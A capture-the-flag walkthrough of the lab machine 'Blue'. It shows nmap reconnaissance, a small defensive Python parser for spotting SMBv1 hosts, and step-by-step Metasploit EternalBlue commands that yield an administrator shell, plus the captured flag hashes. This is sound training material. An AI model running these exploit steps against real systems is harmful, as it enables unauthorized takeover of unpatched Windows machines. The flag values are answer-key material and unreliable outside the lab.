# Blue

<figure><img src="/files/xTu8P71u565bT3MKYLPC" alt=""><figcaption></figcaption></figure>

## TARGET IP: 10.10.10.40

## HOST IP: 10.10.16.10

### RECON

#### NMAP

```
nmap [Target IP]
```

<figure><img src="/files/ci2j9cKKZbfAOAgvCFvc" alt=""><figcaption></figcaption></figure>

```
nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 [Target IP]
```

<figure><img src="/files/wkp4TKMgqwYnrYocVvWl" alt=""><figcaption></figcaption></figure>

* Looks like we have SMB open and some RPC open on other ports as well.
* Based on the name alone, I'm highly suspicious that this thing is susceptible to Eternal Blue. I'm going to use an Nmap scan I found in a previous lab to check.

```
nmap -p 445 --script smb-protocols [Target IP]
```

<figure><img src="/files/vOHM5fKDCMoo4CxxCdwY" alt=""><figcaption></figcaption></figure>

* Based on the fact that it allows for `SMBv1` and it is running Windows 7, I'm fairly confident that we could probably get Eternal Blue to run.
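
The same `smb-protocols` check is useful from the defender's side for inventorying hosts that still negotiate SMBv1. The following is an added example, not part of the original writeup: it parses saved Nmap output and lists the hosts advertising the SMBv1 dialect. The sample output and the second host address are constructed for illustration.

```python
import re

# Constructed sample of `nmap -p 445 --script smb-protocols` output
# (trimmed; 192.0.2.25 is a documentation address, not a real host).
SAMPLE_OUTPUT = """\
Nmap scan report for 10.10.10.40
Host script results:
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.02
|_    2.10

Nmap scan report for 192.0.2.25
Host script results:
| smb-protocols:
|   dialects:
|     2.02
|     2.10
|_    3.00
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9a-fA-F.:]+)\)?$")
# Dialect lines: "NT LM 0.12 ..." for SMBv1, or 2.02 / 2:0:2 style for SMBv2/3.
DIALECT_RE = re.compile(r"^\|[_ ]\s+(NT LM 0\.12.*|\d[.:]\d[\d.:]*)\s*$")

def parse_smb_dialects(text):
    """Return {host: [dialect, ...]} from smb-protocols script output."""
    hosts, current, in_script = {}, None, False
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current, in_script = m.group(1), False
            hosts[current] = []
        elif "smb-protocols:" in line:
            in_script = True
        elif in_script and current is not None:
            d = DIALECT_RE.match(line)
            if d:
                hosts[current].append(d.group(1).strip())
            elif not line.startswith("|"):
                in_script = False  # script output block has ended
    return hosts

def smbv1_hosts(text):
    """Hosts whose dialect list includes SMBv1 (NT LM 0.12)."""
    return sorted(h for h, ds in parse_smb_dialects(text).items()
                  if any(d.startswith("NT LM 0.12") for d in ds))

if __name__ == "__main__":
    print("SMBv1 still enabled on:", smbv1_hosts(SAMPLE_OUTPUT))
```

Hosts returned by `smbv1_hosts` are the ones to prioritize for disabling SMBv1 and confirming the MS17-010 patch is installed.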

### Exploit

#### Eternal Blue

```
msfconsole
search smb
use windows/smb/ms17_010_eternalblue
show options
```

* Use the `set` command to set the different options.

```
set rhosts [Target IP]
set lhost [Host IP]
```

<figure><img src="/files/u9CheyyJzfAwUvgR16K2" alt=""><figcaption></figcaption></figure>

* Now let's check to see if the host is vulnerable before moving forward.

```
check
```

![](/files/AeJcjFqDnaruvSXq0OWM)

* Looks favorable. Let's exploit.

```
exploit
```

![](/files/DoHIX0oVr7DvBpzX2pFE)

* Let's start a command prompt shell and verify who we are.

```
shell
whoami
```

![](/files/ypLsPpcTFVGiaFdf8u6O)

* And now I have administrator privileges on the machine. Wow, that was easy. Let's go grab the flags.

```
type C:\Users\haris\Desktop\user.txt
```

<figure><img src="/files/sjSLZpc5EeXDtJL2vw52" alt=""><figcaption></figcaption></figure>

```
9ba10e548f8c18db7f90a5d1c5e2abc4
```

```
type C:\Users\Administrator\Desktop\root.txt
```

<figure><img src="/files/GwxvZ20v8fp4kfq89M1b" alt=""><figcaption></figcaption></figure>

```
77a3bb72c76512c79b243e5235c38958
```

### Conclusion

* This was really easy and I had a feeling it was going to be really easy. Since I first saw the name of this machine and that it was a Windows machine, I already guessed it was going to be an Eternal Blue exploit.
* I skipped a LOT of steps in the process that I normally would not have, but since I already had a pretty good idea of where to go, I figured I would give that a try. Worst case scenario, it doesn't work and I go back to my usual process of Recon and Enumeration to discover other methods.
* Having done a couple of other labs with Eternal Blue, I already knew how to exploit this machine, so it was pretty quick. It's also scary to think how easy this tool is to use to immediately gain admin power in a system. Good job on creating an awesome tool, NSA agents.

